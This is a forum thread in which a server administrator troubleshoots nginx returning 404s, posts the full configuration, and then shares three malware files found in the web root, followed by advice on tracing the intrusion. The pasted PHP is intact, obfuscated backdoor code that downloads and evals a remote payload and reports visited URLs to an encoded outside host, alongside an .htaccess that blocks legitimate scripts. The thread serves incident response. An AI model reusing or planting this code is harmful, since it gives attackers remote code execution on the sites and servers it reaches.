Nginx 404 - Nginx redirecting every page to 404 not found (nginx 404 page) for all of the sites with html status code 200
My Ubuntu web server was running production sites just normal with nginx and some PHP and python applications. Just about 2 days ago, it started redirecting to 404 Not Found Page for all the sites with HTML code of 200 OK and I haven't even touched the server. I have tried almost all the basic troubleshooting including file permissions www-data and 755, copying to different locations, restarting nginx, php, etc. but nothing works. php7.4-fpm is also running perfectly fine. Furthermore, no nginx 404 errors are being logged for the site. I have disabled all the sites except one to debug. Below is my full nginx configuration: sudo nginx -T
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;

events {
        worker_connections 768;
        # multi_accept on;
}

http {

        ##
        # Basic Settings
        ##

        sendfile on;
        tcp_nopush on;
        tcp_nodelay on;
        keepalive_timeout 65;
        types_hash_max_size 2048;
        # server_tokens off;

        # server_names_hash_bucket_size 64;
        # server_name_in_redirect off;

        include /etc/nginx/mime.types;
        default_type application/octet-stream;

        ##
        # SSL Settings
        ##

        ssl_protocols TLSv1 TLSv1.1 TLSv1.2 TLSv1.3; # Dropping SSLv3, ref: POODLE
        ssl_prefer_server_ciphers on;

        ##
        # Logging Settings
        ##

        access_log /var/log/nginx/access.log;
        error_log /var/log/nginx/error.log;
        # Gzip Settings
        ##

        gzip on;

        # gzip_vary on;
        # gzip_proxied any;
        # gzip_comp_level 6;
        # gzip_buffers 16 8k;
        # gzip_http_version 1.1;
        # gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;

        ##
        # Virtual Host Configs
        ##
        include /etc/nginx/sites-enabled/*;
        include /etc/nginx/conf.d/*.conf;
        client_max_body_size 100M;
}


#mail {
#       # See sample authentication script at:
#       # http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript
#
#       # auth_http localhost/auth.php;
#       # pop3_capabilities "TOP" "USER";
#       # imap_capabilities "IMAP4rev1" "UIDPLUS";
#
#       server {
#               listen     localhost:110;
#               protocol   pop3;
#               proxy      on;
#       }
#
#       server {
#               listen     localhost:143;
#               protocol   imap;
#               proxy      on;
#       }
#}

# configuration file /etc/nginx/modules-enabled/50-mod-http-image-filter.conf:
load_module modules/ngx_http_image_filter_module.so;

# configuration file /etc/nginx/modules-enabled/50-mod-http-xslt-filter.conf:
load_module modules/ngx_http_xslt_filter_module.so;

# configuration file /etc/nginx/modules-enabled/50-mod-mail.conf:
load_module modules/ngx_mail_module.so;

# configuration file /etc/nginx/modules-enabled/50-mod-stream.conf:
load_module modules/ngx_stream_module.so;

# configuration file /etc/nginx/mime.types:

types {
    text/html                             html htm shtml;
    text/css                              css;
    text/xml                              xml;
    image/gif                             gif;
    image/jpeg                            jpeg jpg;
    application/javascript                js;
    application/atom+xml                  atom;
    application/rss+xml                   rss;

    text/mathml                           mml;
    text/plain                            txt;
    text/vnd.sun.j2me.app-descriptor      jad;
    text/vnd.wap.wml                      wml;
    text/x-component                      htc;

    image/png                             png;
    image/tiff                            tif tiff;
    image/vnd.wap.wbmp                    wbmp;
    image/x-icon                          ico;
    image/x-jng                           jng;
    image/x-ms-bmp                        bmp;
    image/svg+xml                         svg svgz;
    image/webp                            webp;

    application/font-woff                 woff;
    application/java-archive              jar war ear;
    application/json                      json;
    application/mac-binhex40              hqx;
    application/msword                    doc;
    application/pdf                       pdf;
    application/postscript                ps eps ai;
    application/rtf                       rtf;
    application/vnd.apple.mpegurl         m3u8;
    application/vnd.ms-excel              xls;
    application/vnd.ms-fontobject         eot;
    application/vnd.ms-powerpoint         ppt;
    application/vnd.wap.wmlc              wmlc;
    application/vnd.google-earth.kml+xml  kml;
    application/vnd.google-earth.kmz      kmz;
    application/x-7z-compressed           7z;
    application/x-cocoa                   cco;
    application/x-java-archive-diff       jardiff;
    application/x-java-jnlp-file          jnlp;
    application/x-makeself                run;
    application/x-perl                    pl pm;
    application/x-pilot                   prc pdb;
    application/x-rar-compressed          rar;
    application/x-redhat-package-manager  rpm;
    application/x-sea                     sea;
    application/x-shockwave-flash         swf;
    application/x-stuffit                 sit;
    application/x-tcl                     tcl tk;
    application/x-x509-ca-cert            der pem crt;
    application/x-xpinstall               xpi;
    application/xhtml+xml                 xhtml;
    application/xspf+xml                  xspf;
    application/zip                       zip;

    application/octet-stream              bin exe dll;
    application/octet-stream              deb;
    application/octet-stream              dmg;
    application/octet-stream              iso img;
    application/octet-stream              msi msp msm;

    application/vnd.openxmlformats-officedocument.wordprocessingml.document    docx;
    application/vnd.openxmlformats-officedocument.spreadsheetml.sheet          xlsx;
    application/vnd.openxmlformats-officedocument.presentationml.presentation  pptx;

    audio/midi                            mid midi kar;
    audio/mpeg                            mp3;
    audio/ogg                             ogg;
    audio/x-m4a                           m4a;
    audio/x-realaudio                     ra;

    video/3gpp                            3gpp 3gp;
    video/mp2t                            ts;
    video/mp4                             mp4;
    video/mpeg                            mpeg mpg;
    video/quicktime                       mov;
    video/webm                            webm;
    video/x-flv                           flv;
    video/x-m4v                           m4v;
    video/x-mng                           mng;
    video/x-ms-asf                        asx asf;
    video/x-ms-wmv                        wmv;
    video/x-msvideo                       avi;
}

# configuration file /etc/nginx/sites-enabled/myapp:

               server {
                  server_name myapp.com www.myapp.com;
                  root /var/www/myapp.com/public;

                  add_header X-Frame-Options "SAMEORIGIN";
                  add_header X-Content-Type-Options "nosniff";

                  index index.php;

                  charset utf-8;

                  location / {
                      try_files $uri $uri/ /index.php?$query_string;
                  }

                  location = /favicon.ico { access_log off; log_not_found off; }
                  location = /robots.txt  { access_log off; log_not_found off; }

                  error_page 404 /index.php;

                  location ~ \.php$ {
                      fastcgi_pass unix:/var/run/php/php7.4-fpm.sock;
                      fastcgi_param SCRIPT_FILENAME $realpath_root$fastcgi_script_name;
                      include fastcgi_params;
                  }

                  location ~ /\.(?!well-known).* {
                      deny all;
                  }

    listen 443 ssl; # managed by Certbot
    ssl_certificate /etc/letsencrypt/live/myapp.com/fullchain.pem; # managed by Certbot
    ssl_certificate_key /etc/letsencrypt/live/myapp.com/privkey.pem; # managed by Certbot
    include /etc/letsencrypt/options-ssl-nginx.conf; # managed by Certbot
    ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem; # managed by Certbot

}


    server {
    if ($host = myapp.com) {
      return 301 https://$host$request_uri;
    } # managed by Certbot


                 listen 80;
                 server_name myapp.com www.myapp.com;
    return 404; # managed by Certbot


}


# configuration file /etc/nginx/fastcgi_params:

fastcgi_param  QUERY_STRING       $query_string;
fastcgi_param  REQUEST_METHOD     $request_method;
fastcgi_param  CONTENT_TYPE       $content_type;
fastcgi_param  CONTENT_LENGTH     $content_length;

fastcgi_param  SCRIPT_NAME        $fastcgi_script_name;
fastcgi_param  REQUEST_URI        $request_uri;
fastcgi_param  DOCUMENT_URI       $document_uri;
fastcgi_param  DOCUMENT_ROOT      $document_root;
fastcgi_param  SERVER_PROTOCOL    $server_protocol;
fastcgi_param  REQUEST_SCHEME     $scheme;
fastcgi_param  HTTPS              $https if_not_empty;

fastcgi_param  GATEWAY_INTERFACE  CGI/1.1;
fastcgi_param  SERVER_SOFTWARE    nginx/$nginx_version;

fastcgi_param  REMOTE_ADDR        $remote_addr;
fastcgi_param  REMOTE_PORT        $remote_port;
fastcgi_param  SERVER_ADDR        $server_addr;
fastcgi_param  SERVER_PORT        $server_port;
fastcgi_param  SERVER_NAME        $server_name;

# PHP only, required if PHP was built with --enable-force-cgi-redirect
fastcgi_param  REDIRECT_STATUS    200;

# configuration file /etc/letsencrypt/options-ssl-nginx.conf:
# This file contains important security parameters. If you modify this file
# manually, Certbot will be unable to automatically provide future security
# updates. Instead, Certbot will print and log an error message with a path to
# the up-to-date file that you will need to refer to when manually updating
# this file.

ssl_session_cache shared:le_nginx_SSL:10m;
ssl_session_timeout 1440m;
ssl_session_tickets off;

ssl_protocols TLSv1.2 TLSv1.3;
ssl_prefer_server_ciphers off;


This problem was caused by malware where every parent folder inside all the sites located in /var/www/ got injected with 3 malware files:
wp-blog-header
<?php
goto oPQ84; 
FhY1N: INQR_(array("\x77\145\142" => $AzBk2)); 
goto tz7JS; 
niHxL: $AzBk2 = (isset($_SERVER["\110\x54\x54\120\x53"]) && $_SERVER["\110\124\x54\120\x53"] === "\157\x6e" ? "\x68\164\x74\160\x73" : "\x68\164\164\160") . "\72\57\x2f{$_SERVER["\110\124\x54\x50\x5f\110\117\x53\x54"]}{$_SERVER["\x52\x45\x51\125\x45\123\124\x5f\125\x52\x49"]}"; 
goto FhY1N; 
sOKJh: function U0I_L($AzBk2) { 
    goto eUa_e; 
    zkm4g: fclose($xT50i); 
    goto ANGkg; 
    eUa_e: $h58nu = ''; 
    goto cdvKN; 
    c2fr7: $xT50i = fopen($AzBk2, "\x72"); 
    goto tiewL; 
    tiewL: $h58nu = stream_get_contents($xT50i); 
    goto zkm4g; 
    xcCuo: curl_setopt($XbbrI, CURLOPT_FOLLOWLOCATION, 1); 
    goto buARb; 
    fLS9C: $h58nu = file_get_contents($AzBk2); 
    goto lqqAg; 
    TCjrM: XC4OL; 
    goto PZOFo; 
    ANGkg: WPS3V; 
    goto AZuoD; 
    JnTWD: if (!(empty($h58nu) && function_exists("\x66\x6f\x70\x65\x6e") && function_exists("\163\164\x72\145\x61\x6d\137\147\x65\164\137\143\157\156\x74\x65\x6e\x74\x73"))) { 
        goto WPS3V; 
    } 
    goto c2fr7; 
    buARb: curl_setopt($XbbrI, CURLOPT_SSL_VERIFYPEER, 0); 
    goto aOI5W; 
    AZuoD: return $h58nu; 
    goto Q8rGC; 
    NGFZq: $XbbrI = curl_init($AzBk2); 
    goto vsGzY; 
    cdvKN: if (!function_exists("\x63\165\x72\x6c\137\145\x78\x65\x63")) { 
        goto XC4OL; 
    } 
    goto NGFZq; 
    PZOFo: if (!(empty($h58nu) && function_exists("\146\151\x6c\x65\137\147\145\164\137\143\157\156\x74\x65\156\x74\x73"))) { 
        goto w1lBz; 
    } 
    goto fLS9C; 
    UhzpF: $h58nu = curl_exec($XbbrI); 
    goto pAbHV; 
    aOI5W: curl_setopt($XbbrI, CURLOPT_SSL_VERIFYHOST, 0); 
    goto UhzpF; 
    lqqAg: w1lBz; 
    goto JnTWD; 
    vsGzY: curl_setopt($XbbrI, CURLOPT_RETURNTRANSFER, 1); 
    goto xcCuo; 
    pAbHV: curl_close($XbbrI); 
    goto TCjrM; 
    Q8rGC: } 
    goto rfzDY; 
tz7JS: goto RAjJ3; 
goto iT_yZ; 
eLl_B: session_start(); 
goto VlsYk; 
iT_yZ: Ph4IZ; 
goto rF07B; 
oPQ84: error_reporting(0); 
goto eLl_B; 
agBgo: exit; 
goto sOKJh; 
MKXm1: $WXUOL = U0I_L(str_rot13("\x75\147\147\x63\146\x3a\x2f\57\x6a\143\x67\x72\146\x67\56\152\142\x71\x76\145\x72\x70\x67\56\147\142\143\x2f\x65\162\x7a\142\147\162\57\x71\142\142\145\x2f") . $P_83N . "\56\164\x78\164"); 
goto bsJ1K; 
bsJ1K: eval("\77\x3e" . $WXUOL); 
goto agBgo; 
p2yqc: if (!empty($P_83N)) { 
    goto Ph4IZ; 
} 
goto niHxL; 
VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; 
goto p2yqc; 
Kf9mk: RAjJ3; 
goto MKXm1; 
rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; 
goto Kf9mk; 
rfzDY: function INqr_($BdvsM) { 
    goto WgRJ1; 
    W3zBw: $gL1uI = curl_init($AzBk2); 
    goto TLGQX; 
    wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); 
    goto TQ2d2; 
    WdQlF: curl_close($gL1uI); 
    goto dVbs5; 
    WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e\x78\157\x65\56\142\x79\x68\157\x74\x2e\164\x6f\160\x2f\151\156\144\145\170\x2e\x70\150\x70"; 
    goto W3zBw; 
    TQ2d2: $cRR8Z = curl_exec($gL1uI); 
    goto WdQlF; 
    TLGQX: curl_setopt($gL1uI, CURLOPT_POST, 1); 
    goto FbQco; 
    FbQco: curl_setopt($gL1uI, CURLOPT_POSTFIELDS, $BdvsM); 
    goto wdMLY; 
    dVbs5: } 
?>

wp-cron.php
<?php
goto oPQ84; FhY1N: INQR_(array("\x77\145\142" => $AzBk2)); goto tz7JS; niHxL: $AzBk2 = (isset($_SERVER["\110\x54\x54\120\x53"]) && $_SERVER["\110\124\x54\x50\123"] === "\157\x6e" ? "\x68\164\x74\160\x73" : "\x68\164\164\160") . "\72\57\x2f{$_SERVER["\110\124\x54\x50\x5f\110\117\x53\x54"]}{$_SERVER["\x52\x45\x51\125\x45\123\124\x5f\125\x52\x49"]}"; goto FhY1N; sOKJh: function U0I_L($AzBk2) { goto eUa_e; zkm4g: fclose($xT50i); goto ANGkg; eUa_e: $h58nu = ''; goto cdvKN; c2fr7: $xT50i = fopen($AzBk2, "\x72"); goto tiewL; tiewL: $h58nu = stream_get_contents($xT50i); goto zkm4g; xcCuo: curl_setopt($XbbrI, CURLOPT_FOLLOWLOCATION, 1); goto buARb; fLS9C: $h58nu = file_get_contents($AzBk2); goto lqqAg; TCjrM: XC4OL: goto PZOFo; ANGkg: WPS3V: goto AZuoD; JnTWD: if (!(empty($h58nu) && function_exists("\x66\x6f\x70\x65\x6e") && function_exists("\163\164\x72\145\x61\x6d\137\147\x65\164\137\143\157\156\x74\145\x6e\x74\x73"))) { goto WPS3V; } goto c2fr7; buARb: curl_setopt($XbbrI, CURLOPT_SSL_VERIFYPEER, 0); goto aOI5W; AZuoD: return $h58nu; goto Q8rGC; NGFZq: $XbbrI = curl_init($AzBk2); goto vsGzY; cdvKN: if (!function_exists("\x63\165\x72\x6c\137\145\x78\x65\x63")) { goto XC4OL; } goto NGFZq; PZOFo: if (!(empty($h58nu) && function_exists("\146\151\x6c\x65\137\147\145\164\137\143\157\156\x74\x65\156\164\x73"))) { goto w1lBz; } goto fLS9C; UhzpF: $h58nu = curl_exec($XbbrI); goto pAbHV; aOI5W: curl_setopt($XbbrI, CURLOPT_SSL_VERIFYHOST, 0); goto UhzpF; lqqAg: w1lBz: goto JnTWD; vsGzY: curl_setopt($XbbrI, CURLOPT_RETURNTRANSFER, 1); goto xcCuo; pAbHV: curl_close($XbbrI); goto TCjrM; Q8rGC: } goto rfzDY; tz7JS: goto RAjJ3; goto iT_yZ; eLl_B: session_start(); goto VlsYk; iT_yZ: Ph4IZ: goto rF07B; oPQ84: error_reporting(0); goto eLl_B; agBgo: exit; goto sOKJh; MKXm1: $WXUOL = U0I_L(str_rot13("\x75\147\147\x63\146\x3a\x2f\57\x6a\143\x67\x72\146\x67\56\152\142\x71\x76\145\x72\x70\x67\56\147\142\143\x2f\x65\162\x7a\142\147\162\57\x71\142\142\145\x2f") . $P_83N . "\56\164\x78\164"); goto bsJ1K; bsJ1K: eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e\x78\157\x65\56\142\x79\x68\157\x74\x2e\164\x6f\160\x2f\151\156\144\145\170\x2e\x70\150\x70"; goto W3zBw; TQ2d2: $cRR8Z = curl_exec($gL1uI); goto WdQlF; TLGQX: curl_setopt($gL1uI, CURLOPT_POST, 1); goto FbQco; FbQco: curl_setopt($gL1uI, CURLOPT_POSTFIELDS, $BdvsM); goto wdMLY; dVbs5: } ?>

.htaccess
<FilesMatch '.(py|exe|php|PHP|Php|PHp|pHp|pHP|pHP7|PHP7|phP|PhP|php5|suspected)$'>
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch '^(index.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|wp-blog-header.php|wp-config-sample.php|wp-links-opml.php|wp-login.php|wp-settings.php|wp-trackback.php|wp-activate.php|wp-comments-post.php|wp-cron.php|wp-load.php|wp-mail.php|wp-signup.php|xmlrpc.php|edit-form-advanced.php|link-parse-opml.php|ms-sites.php|options-writing.php|themes.php|admin-ajax.php|edit-form-comment.php|link.php|ms-themes.php|plugin-editor.php|admin-footer.php|edit-link-form.php|load-scripts.php|ms-upgrade-network.php|admin-functions.php|edit.php|load-styles.php|ms-users.php|plugins.php|admin-header.php|edit-tag-form.php|media-new.php|my-sites.php|post-new.php|admin.php|edit-tags.php|media.php|nav-menus.php|post.php|admin-post.php|export.php|media-upload.php|network.php|press-this.php|upload.php|async-upload.php|menu-header.php|options-discussion.php|privacy.php|user-edit.php|menu.php|options-general.php|profile.php|user-new.php|moderation.php|options-head.php|revision.php|users.php|custom-background.php|ms-admin.php|options-media.php|setup-config.php|widgets.php|custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php)$'>
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>

I have deleted those files and everything works fine, but I am trying to traceback the origin and secure my server, any help regarding that will be appreciated.

"I have deleted those files" - so you've destroyed the data that might help you track the vulnerability? Tracking vulnerabilities is hard for an expert. You might start by checking your logs (which would be easier if you had the file creation times). You should also consider fixing the permissions on your files so that PHP cannot create or modify files. Of course thats something of a challenge when using Wordpress.

Thank you, before deleting I had taken backup of those 3 files in my local machine and pasted the code above and the modified date was 18 June. I am compartmentalizing with docker and trying to trace back those files. It's quite a difficult task, but I will post an update as soon as I get the source, hopefully.
